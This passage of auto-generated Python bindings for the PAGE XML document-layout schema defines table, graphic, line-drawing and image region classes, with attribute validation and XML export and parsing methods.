if value in ('true', '1'):
self.embText = True
elif value in ('false', '0'):
self.embText = False
else:
raise_parse_error(node, 'Bad boolean attribute')
super(ChartRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(ChartRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class ChartRegionType
class TableRegionType(RegionType):
"""Tabular data in any form is represented with a table
region. Rows and columns may or may not have separator
lines; these lines are not separator regions.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The number of rows present in the table
The number of columns present in the table
The colour of the lines used in the region
The background colour of the region
Specifies the presence of line separators
Specifies whether the region also contains
text"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('rows', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('columns', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('lineColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('lineSeparators', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('Grid', 'GridType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Grid', 'type': 'GridType'}, None),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, rows=None, columns=None, lineColour=None, bgColour=None, lineSeparators=None, embText=None, Grid=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("TableRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.rows = _cast(int, rows)
self.rows_nsprefix_ = None
self.columns = _cast(int, columns)
self.columns_nsprefix_ = None
self.lineColour = _cast(None, lineColour)
self.lineColour_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
self.lineSeparators = _cast(bool, lineSeparators)
self.lineSeparators_nsprefix_ = None
self.embText = _cast(bool, embText)
self.embText_nsprefix_ = None
self.Grid = Grid
self.Grid_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TableRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TableRegionType.subclass:
return TableRegionType.subclass(*args_, **kwargs_)
else:
return TableRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Grid(self):
return self.Grid
def set_Grid(self, Grid):
self.Grid = Grid
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_rows(self):
return self.rows
def set_rows(self, rows):
self.rows = rows
def get_columns(self):
return self.columns
def set_columns(self, columns):
self.columns = columns
def get_lineColour(self):
return self.lineColour
def set_lineColour(self, lineColour):
self.lineColour = lineColour
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def get_lineSeparators(self):
return self.lineSeparators
def set_lineSeparators(self, lineSeparators):
self.lineSeparators = lineSeparators
def get_embText(self):
return self.embText
def set_embText(self, embText):
self.embText = embText
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.Grid is not None or
super(TableRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TableRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'TableRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TableRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TableRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TableRegionType'):
super(TableRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TableRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.rows is not None and 'rows' not in already_processed:
already_processed.add('rows')
outfile.write(' rows="%s"' % self.gds_format_integer(self.rows, input_name='rows'))
if self.columns is not None and 'columns' not in already_processed:
already_processed.add('columns')
outfile.write(' columns="%s"' % self.gds_format_integer(self.columns, input_name='columns'))
if self.lineColour is not None and 'lineColour' not in already_processed:
already_processed.add('lineColour')
outfile.write(' lineColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.lineColour), input_name='lineColour')), ))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
if self.lineSeparators is not None and 'lineSeparators' not in already_processed:
already_processed.add('lineSeparators')
outfile.write(' lineSeparators="%s"' % self.gds_format_boolean(self.lineSeparators, input_name='lineSeparators'))
if self.embText is not None and 'embText' not in already_processed:
already_processed.add('embText')
outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableRegionType', fromsubclass_=False, pretty_print=True):
super(TableRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Grid is not None:
namespaceprefix_ = self.Grid_nsprefix_ + ':' if (UseCapturedNS_ and self.Grid_nsprefix_) else ''
self.Grid.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Grid', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('rows', node)
if value is not None and 'rows' not in already_processed:
already_processed.add('rows')
self.rows = self.gds_parse_integer(value, node, 'rows')
value = find_attr_value_('columns', node)
if value is not None and 'columns' not in already_processed:
already_processed.add('columns')
self.columns = self.gds_parse_integer(value, node, 'columns')
value = find_attr_value_('lineColour', node)
if value is not None and 'lineColour' not in already_processed:
already_processed.add('lineColour')
self.lineColour = value
self.validate_ColourSimpleType(self.lineColour) # validate type ColourSimpleType
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
value = find_attr_value_('lineSeparators', node)
if value is not None and 'lineSeparators' not in already_processed:
already_processed.add('lineSeparators')
if value in ('true', '1'):
self.lineSeparators = True
elif value in ('false', '0'):
self.lineSeparators = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('embText', node)
if value is not None and 'embText' not in already_processed:
already_processed.add('embText')
if value in ('true', '1'):
self.embText = True
elif value in ('false', '0'):
self.embText = False
else:
raise_parse_error(node, 'Bad boolean attribute')
super(TableRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Grid':
obj_ = GridType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Grid = obj_
obj_.original_tagname_ = 'Grid'
super(TableRegionType, self).buildChildren(child_, node, nodeName_, True)
# end class TableRegionType
class GraphicRegionType(RegionType):
"""Regions containing simple graphics, such as a company
logo, should be marked as graphic regions.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The type of graphic in the region
An approximation of the number of colours
used in the region
Specifies whether the region also contains
text."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:GraphicsTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('numColours', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, type_=None, numColours=None, embText=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("GraphicRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.numColours = _cast(int, numColours)
self.numColours_nsprefix_ = None
self.embText = _cast(bool, embText)
self.embText_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GraphicRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GraphicRegionType.subclass:
return GraphicRegionType.subclass(*args_, **kwargs_)
else:
return GraphicRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_numColours(self):
return self.numColours
def set_numColours(self, numColours):
self.numColours = numColours
def get_embText(self):
return self.embText
def set_embText(self, embText):
self.embText = embText
def validate_GraphicsTypeSimpleType(self, value):
# Validate type pc:GraphicsTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['logo', 'letterhead', 'decoration', 'frame', 'handwritten-annotation', 'stamp', 'signature', 'barcode', 'paper-grow', 'punch-hole', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GraphicsTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(GraphicRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphicRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphicRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GraphicRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphicRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphicRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphicRegionType'):
super(GraphicRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphicRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.numColours is not None and 'numColours' not in already_processed:
already_processed.add('numColours')
outfile.write(' numColours="%s"' % self.gds_format_integer(self.numColours, input_name='numColours'))
if self.embText is not None and 'embText' not in already_processed:
already_processed.add('embText')
outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphicRegionType', fromsubclass_=False, pretty_print=True):
super(GraphicRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_GraphicsTypeSimpleType(self.type_) # validate type GraphicsTypeSimpleType
value = find_attr_value_('numColours', node)
if value is not None and 'numColours' not in already_processed:
already_processed.add('numColours')
self.numColours = self.gds_parse_integer(value, node, 'numColours')
value = find_attr_value_('embText', node)
if value is not None and 'embText' not in already_processed:
already_processed.add('embText')
if value in ('true', '1'):
self.embText = True
elif value in ('false', '0'):
self.embText = False
else:
raise_parse_error(node, 'Bad boolean attribute')
super(GraphicRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(GraphicRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class GraphicRegionType
class LineDrawingRegionType(RegionType):
"""A line drawing is a single colour illustration without
solid areas.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The pen (foreground) colour of the region
The background colour of the region
Specifies whether the region also contains
text"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('penColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, penColour=None, bgColour=None, embText=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("LineDrawingRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.penColour = _cast(None, penColour)
self.penColour_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
self.embText = _cast(bool, embText)
self.embText_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, LineDrawingRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if LineDrawingRegionType.subclass:
return LineDrawingRegionType.subclass(*args_, **kwargs_)
else:
return LineDrawingRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_penColour(self):
return self.penColour
def set_penColour(self, penColour):
self.penColour = penColour
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def get_embText(self):
return self.embText
def set_embText(self, embText):
self.embText = embText
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(LineDrawingRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LineDrawingRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('LineDrawingRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'LineDrawingRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LineDrawingRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LineDrawingRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LineDrawingRegionType'):
super(LineDrawingRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LineDrawingRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.penColour is not None and 'penColour' not in already_processed:
already_processed.add('penColour')
outfile.write(' penColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.penColour), input_name='penColour')), ))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
if self.embText is not None and 'embText' not in already_processed:
already_processed.add('embText')
outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LineDrawingRegionType', fromsubclass_=False, pretty_print=True):
super(LineDrawingRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('penColour', node)
if value is not None and 'penColour' not in already_processed:
already_processed.add('penColour')
self.penColour = value
self.validate_ColourSimpleType(self.penColour) # validate type ColourSimpleType
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
value = find_attr_value_('embText', node)
if value is not None and 'embText' not in already_processed:
already_processed.add('embText')
if value in ('true', '1'):
self.embText = True
elif value in ('false', '0'):
self.embText = False
else:
raise_parse_error(node, 'Bad boolean attribute')
super(LineDrawingRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(LineDrawingRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class LineDrawingRegionType
class ImageRegionType(RegionType):
"""An image is considered to be more intricate and complex
than a graphic. These can be photos or drawings.
The angle the rectangle encapsulating a region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
The colour bit depth required for the region
The background colour of the region
Specifies whether the region also contains
text"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('colourDepth', 'pc:ColourDepthSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, colourDepth=None, bgColour=None, embText=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("ImageRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.colourDepth = _cast(None, colourDepth)
self.colourDepth_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
self.embText = _cast(bool, embText)
self.embText_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ImageRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ImageRegionType.subclass:
return ImageRegionType.subclass(*args_, **kwargs_)
else:
return ImageRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_colourDepth(self):
return self.colourDepth
def set_colourDepth(self, colourDepth):
self.colourDepth = colourDepth
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def get_embText(self):
return self.embText
def set_embText(self, embText):
self.embText = embText
def validate_ColourDepthSimpleType(self, value):
# Validate type pc:ColourDepthSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['bilevel', 'greyscale', 'colour', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourDepthSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(ImageRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ImageRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ImageRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ImageRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
